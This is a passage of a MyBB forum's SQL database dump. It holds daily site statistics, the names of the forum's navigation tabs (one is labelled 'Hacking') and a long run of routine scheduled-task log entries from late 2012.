'1103', '6417'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351468800', '215', '1113', '6488'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351555200', '217', '1117', '6543'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351641600', '218', '1138', '6641'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351728000', '223', '1151', '6736'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351814400', '225', '1155', '6785'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351900800', '228', '1162', '6829'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351915200', '228', '1162', '6826'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1351987200', '230', '1166', '6871'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352073600', '233', '1167', '6877'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352160000', '237', '1181', '6978'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352246400', '236', '1195', '7062'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352178000', '235', '1181', '6992'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352332800', '241', '1202', '7094'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352419200', '246', '1207', '7132'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352505600', '250', '1224', '7262'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352592000', '253', '1229', '7340'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352678400', '253', '1230', '7344'); INSERT INTO `mybb_stats` (`dateline`, `numusers`, `numthreads`, `numposts`) VALUES ('1352764800', '254', '1234', '7379'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_tabmenu`; CREATE TABLE `mybb_tabmenu` ( `tabid` smallint(3) NOT NULL AUTO_INCREMENT, `tabname` varchar(64) NOT NULL, `tabcats` varchar(255) NOT NULL, PRIMARY KEY (`tabid`) ) ENGINE=MyISAM AUTO_INCREMENT=26 DEFAULT CHARSET=latin1; LOCK TABLES `mybb_tabmenu` WRITE; INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('6', 'General ', '1,6'); INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('5', 'Hacking', '10'); INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('12', ' Coding', '51'); INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('13', 'Computing', '22'); INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('24', 'Groups', '57'); INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('23', 'Upgraded', '26,31'); INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('22', 'Gaming', '70'); INSERT INTO `mybb_tabmenu` (`tabid`, `tabname`, `tabcats`) VALUES ('25', 'Graphics', '32'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_tasklog`; CREATE TABLE `mybb_tasklog` ( `lid` int(10) unsigned NOT NULL AUTO_INCREMENT, `tid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `data` text NOT NULL, PRIMARY KEY (`lid`) ) ENGINE=MyISAM AUTO_INCREMENT=16306 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_tasklog` WRITE; INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14706', '9', '1351999565', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14705', '5', '1351999193', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14704', '7', '1351998076', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14703', '1', '1351998020', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14702', '3', '1351997957', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14701', '9', '1351997955', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14700', '5', '1351997220', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14699', '7', '1351997133', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14698', '1', '1351996899', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14697', '3', '1351994424', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14696', '9', '1351994266', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14695', '5', '1351993594', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14694', '9', '1351993594', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14693', '3', '1351993591', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14692', '5', '1351992441', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14691', '9', '1351992337', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14690', '5', '1351992027', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14689', '7', '1351992024', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14688', '1', '1351992017', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14687', '3', '1351990837', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14686', '9', '1351990736', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14685', '5', '1351989981', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14684', '9', '1351989630', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14683', '3', '1351989508', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14682', '9', '1351989327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14681', '5', '1351989306', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14680', '9', '1351988093', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14679', '5', '1351988080', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14678', '11', '1351987999', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14677', '7', '1351987992', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14676', '2', '1351987990', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14675', '1', '1351987538', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14674', '3', '1351987436', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14673', '9', '1351986923', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14672', '5', '1351986435', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14671', '9', '1351986062', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14670', '3', '1351985416', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14669', '9', '1351985342', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14668', '5', '1351985338', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14667', '9', '1351984221', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14666', '5', '1351983909', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14665', '7', '1351983602', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14664', '1', '1351983602', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14663', '3', '1351983552', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14662', '9', '1351983319', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14661', '5', '1351982851', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14660', '9', '1351982841', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14659', '3', '1351981986', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14658', '9', '1351981982', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14657', '5', '1351981975', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14656', '9', '1351981160', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14655', '5', '1351980356', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14654', '7', '1351980354', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14653', '1', '1351980313', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14652', '3', '1351980300', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14651', '9', '1351979735', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14650', '5', '1351979517', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14649', '3', '1351978850', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14648', '5', '1351978847', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14647', '9', '1351978843', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14646', '5', '1351977052', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14645', '7', '1351977050', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14644', '1', '1351977046', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14643', '3', '1351976719', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14642', '9', '1351976718', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14641', '5', '1351975739', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14640', '3', '1351975487', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14639', '5', '1351975430', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14638', '9', '1351975426', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14637', '5', '1351973320', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14636', '7', '1351973313', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14635', '1', '1351973292', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14634', '3', '1351973128', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14633', '9', '1351973112', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14632', '5', '1351972986', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14631', '9', '1351971629', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14630', '3', '1351971009', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14629', '9', '1351971003', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14628', '5', '1351970994', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14627', '7', '1351970228', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14626', '1', '1351970104', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14625', '3', '1351970095', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14624', '9', '1351969491', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14623', '5', '1351968316', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14622', '9', '1351968255', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14621', '3', '1351967401', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14620', '9', '1351967327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14619', '5', '1351967276', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14618', '9', '1351966790', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14617', '5', '1351966058', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14616', '7', '1351966014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14615', '1', '1351965605', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14614', '3', '1351965567', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14613', '9', '1351965560', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14612', '3', '1351964897', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14611', '9', '1351964887', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14610', '5', '1351964751', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14609', '9', '1351963295', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14608', '5', '1351963270', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14607', '7', '1351963239', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14606', '1', '1351963130', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14605', '3', '1351962049', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14604', '9', '1351962018', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14603', '5', '1351961118', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14602', '9', '1351960902', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14601', '3', '1351960409', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14600', '9', '1351960081', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14599', '5', '1351960065', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14598', '9', '1351959318', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14597', '5', '1351958960', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14596', '7', '1351958958', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14595', '1', '1351958954', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14594', '3', '1351958950', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14593', '9', '1351958188', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14592', '5', '1351957723', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14591', '3', '1351957719', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14590', '9', '1351957404', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14589', '5', '1351957396', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14588', '9', '1351955433', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14587', '5', '1351955426', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14586', '7', '1351954875', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14585', '1', '1351954864', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14584', '3', '1351954847', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14583', '9', '1351954844', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14582', '5', '1351954237', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14581', '9', '1351954071', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14580', '3', '1351953185', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14579', '9', '1351953180', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14578', '5', '1351953133', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14577', '7', '1351953127', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14576', '1', '1351951471', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14575', '3', '1351951450', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14574', '9', '1351950962', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14573', '5', '1351950684', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14572', '9', '1351950671', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14571', '3', '1351949786', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14570', '9', '1351949173', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14569', '5', '1351949158', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14568', '9', '1351948206', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14567', '5', '1351948146', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14566', '7', '1351948146', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14565', '1', '1351948139', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14564', '3', '1351948137', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14563', '9', '1351947749', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14562', '7', '1351946815', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14561', '5', '1351946820', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14560', '1', '1351946808', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14559', '3', '1351946799', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14558', '9', '1351946768', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14557', '5', '1351943140', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14556', '9', '1351942940', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14555', '3', '1351942582', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14554', '5', '1351942396', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14553', '9', '1351942392', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14552', '5', '1351940709', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14551', '7', '1351940501', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14550', '1', '1351940501', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14549', '3', '1351940497', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14548', '9', '1351940492', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14547', '5', '1351940446', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14546', '9', '1351937555', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14545', '5', '1351937142', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14544', '7', '1351936936', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14543', '1', '1351936922', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14542', '3', '1351936752', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14541', '9', '1351936650', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14540', '5', '1351936636', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14539', '7', '1351936607', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14538', '1', '1351936598', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14537', '3', '1351936597', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14536', '9', '1351936492', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14535', '9', '1351932646', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14534', '7', '1351932644', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14533', '5', '1351932644', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14532', '1', '1351932637', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14531', '3', '1351932183', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14530', '9', '1351931447', 